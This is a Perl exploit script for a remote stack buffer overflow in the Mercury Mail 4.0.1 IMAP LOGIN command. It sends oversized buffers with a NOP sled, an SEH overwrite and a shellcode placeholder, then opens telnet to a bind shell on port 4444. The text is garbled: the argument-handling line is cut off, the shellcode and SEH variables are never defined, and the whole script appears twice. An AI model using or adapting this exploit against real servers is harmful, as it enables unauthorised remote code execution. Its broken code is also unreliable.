Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit
#!/usr/bin/perl
#
# http://www.securityfocus.com/bid/11775
# credit to Muts for this vulnerability
# acaro [at] jervus.it
use IO::Socket::INET;
use Switch;
if (@ARGV new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
send $socket, $request, 0;
print "[ ] Sent 1st request\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
sleep(1);
my $request ="\x41" x 255;
send $socket, $request, 0;
print "[ ] Sent 2nd request\n";
sleep(1);
my $request=("\x45" x7420).("\x90" x10).$happy.("\x90" x14).$shellcode.("\x41" x8).$nextseh.$seh.("\x90" x5).$jmp.("\x90" x533);
send $socket, $request, 0;
print "[ ] Sent final request\n";
sleep(1);
close($socket);
print " connect on port 4444 of $host ...\n";
sleep(3);
system("telnet $host 4444");
exit;
//http://www.leftworld.net
#
# http://www.securityfocus.com/bid/11775
# credit to Muts for this vulnerability
# acaro [at] jervus.it
use IO::Socket::INET;
use Switch;
if (@ARGV new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
send $socket, $request, 0;
print "[ ] Sent 1st request\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
sleep(1);
my $request ="\x41" x 255;
send $socket, $request, 0;
print "[ ] Sent 2nd request\n";
sleep(1);
my $request=("\x45" x7420).("\x90" x10).$happy.("\x90" x14).$shellcode.("\x41" x8).$nextseh.$seh.("\x90" x5).$jmp.("\x90" x533);
send $socket, $request, 0;
print "[ ] Sent final request\n";
sleep(1);
close($socket);
print " connect on port 4444 of $host ...\n";
sleep(3);
system("telnet $host 4444");
exit;
//http://www.leftworld.net
